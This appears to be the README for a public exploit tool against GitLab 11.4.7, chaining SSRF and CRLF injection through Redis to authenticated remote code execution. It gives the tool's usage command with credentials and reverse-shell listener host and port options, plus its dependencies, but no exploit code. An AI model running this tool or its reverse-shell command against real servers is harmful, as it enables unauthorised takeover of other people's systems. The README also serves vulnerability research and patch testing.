GitLab-11.4.7-Authenticated-Remote-Code-Execution

(SSRF + CRLF -> Redis -> RCE)

Blog : https://github.com/jas502n/gitlab-SSRF-redis-RCE/blob/master/README.md

Usage : python3 gitlab_rce.py -U `USERNAME` -P `PASSWORD` -l `LHOST` -p `LPORT`

usage: gitlab_rce.py [-h] [-U U] [-P P] [-l L] [-p P]

GitLab 11.4.7 Authenticated RCE

optional arguments:

-h, --help show this help message and exit

-U GitLab Username

-P Gitlab Password

-l rev shell lhost

-p rev shell lport

Dependencies

pip3 install RandomWords==0.3.0

pip3 install bs4

pip3 install requests